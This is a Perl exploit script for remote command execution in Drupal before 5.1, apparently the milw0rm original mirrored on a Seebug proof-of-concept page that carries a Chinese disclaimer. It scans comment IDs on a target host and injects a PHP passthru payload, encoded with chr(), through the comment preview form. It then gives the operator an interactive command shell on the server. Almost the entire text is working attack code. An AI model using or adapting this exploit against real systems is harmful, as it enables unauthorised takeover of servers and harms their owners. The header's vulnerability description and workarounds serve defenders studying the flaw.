#!/usr/bin/perl # # $Id: milw0rm_drupalv5.pl,v 0.2 2007/02/15 13:40:29 str0ke Exp $ # _drupalv5.pl - Drupal < 5.1 Remote Command Execution Exploit # Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com> # # Description # ----------- # Previews on comments were not passed through normal form validation routines, # enabling users with the \'post comments\' permission and access to more than one # input filter to execute arbitrary code. By default, anonymous and authenticated # users have access to only one input format. # Immediate workarounds include: disabling the comment module, revoking the \'post # comments\' permission for all users or limiting access to one input format. # Versions affected # ----------------- # - Drupal 5.x versions before Drupal 5.1 # # [02/15/2007] The exploit has been fixed. /str0ke # use strict; use LWP::UserAgent; my $host = shift || &usage; my $dir = shift || \"/drupal\"; my $proxy = shift; my $command; my $conn = LWP::UserAgent->new(); $conn -> proxy(\"http\", \"http://\".$proxy.\"/\") unless !$proxy; sub usage() { print \"[?] Drupal < 5.1 Remote Command Execution Exploit \"; print \"[?] Copyright (c) 2007 str0ke <str0ke[!]milw0rm.com> \"; print \"[?] usage: perl $0 [host] [directory] [proxy] \"; print \" [host] (ex. www.milw0rm.com) \"; print \" [directory] (ex. /drupal) \"; print \" [proxy] (ex. 0.0.0.0:8080) \"; exit; } sub exploit() { my $i = $_[0]; my $command = $_[1] || \'ls -l\'; my $cmd = \'echo start_er;\'.$command.\';\'.\'echo end_er\'; my $byte = join(\'.\', map { $_ = \'chr(\'.$_.\')\' } unpack(\'C*\', $cmd)); my $req = HTTP::Request->new(POST => \"http://\" . $host . $dir . \"/?q=comment/reply/\" . $i); $req -> content_type(\'application/x-www-form-urlencoded\'); $req -> content(\'subject=My daddy beats me&comment=<?passthru(\'.$byte.\');?>&format=2&form_id=comment_form&op=Preview comment\'); my $content = $conn->request($req); if ($content->content =~ m/start_er(.*?)end_er/ms) { my $out = $1; if ($out) { print \"$out \"; } else { print \"[-] Exploit Failed... \"; exit; } } } for my $i ( 1 .. 400 ) { my $output = $conn -> get(\"http://\" . $host . $dir . \"/?q=comment/reply/\" . $i); if($output -> is_success) { if($output -> content =~ /add new comment/) { print \"[+] found comment/reply: $i \"; &exploit($i); while() { print \"str0kin-drupal$ \"; chomp($command = <STDIN>); exit unless $command; &exploit($i, $command); } exit; } } } print \"[-] Exploit Failed... \";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论